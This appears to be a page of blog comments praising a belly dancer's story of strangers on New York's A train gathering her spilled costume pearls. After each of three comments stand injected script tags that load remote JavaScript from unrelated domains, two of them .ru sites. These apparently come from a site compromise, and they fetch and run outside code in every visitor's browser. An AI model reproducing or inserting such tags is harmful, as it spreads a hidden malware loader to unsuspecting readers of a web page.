I am reminded that iridescent beauties are created because of a slight irritation...being a native NY'er...it's no wonder that you are a perfect Pearl!

Another funny part of this story is that one gentleman in particular was extremely diligent about picking up as many pearls for me as possible. By the time he was done he was so red-faced from bending down and standing up and bending down and standing up so finally he said to me, "Lady, I hope these pearls are real! I haven't gotten this much exercise in a long time!" I thought that was just hysterical... One elderly gentleman who was of Jamaican descent (and sounded just like my in-laws) said, "I want my wife to take some belly dancing lessons". There was such an amusing exchange of conversation in that train car. I'll never forget that evening. My best, Laylamary<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

It seems that we are always called upon to educate the world about the virtues of our Delightful Dance.
Years ago, when I'd finish working at what ever club I was at in NYC, I'd go to the Feenjon...this was at 4:00am. The Feenjon Group would be playing and I'd carry PRE WAXED AND THREADED needles and bring my beads with me so that the beads would be infused with the music and the music infused in the costume.
Hip bands and bras would be dismantled in the same way.
xxoo

What a magical story! I guess we can never forget that we love and represent ourselves in with this dance 24hours a day!
It is so wonderful to hear that there was such open-minded and unrestricted inquiry from the unsuspecting participants of the "pearl" car on the A train. (I can't imagine it happening in Athens, but who knows!?!)
I think that response from the curious is very New York...that kind readiness for anything to happen, and anything to influence our not-so-typical days. I hope those who were inspired to visit their first class, or to see a show, or to simply think of "belly dance" differently, remember that day as one in many "pearls of wisdom" to enlighten them and enjoy something NEW for them.
And to you...you have yet another sentimental tie to that beautiful costume!!! and cherish that significant (and comical) trip which you just "happened" to take on the A-train with pride and purpose.
Our lives are more enriched as we enrich the lives of others.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

It is apparent that your love runs deep for ME dance. Now,you have become the ambassador of the A Train! It is important to conduct ourselves in a humane and ladylike way.(always) especially when we are representing ME dance. Your zainy approach is infectious and you are THE belly dancer to all those people on that train. We have to remember that when we put on the costume(or sew it) we repressent this beautiful dance form. BTW,this costume looks gorgeous on you and now even more so in my mind. That skirt is the "cat's meow"-30 yards of fabric!!! Yes,you need no hobbies. XOXO:-) Esma<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |
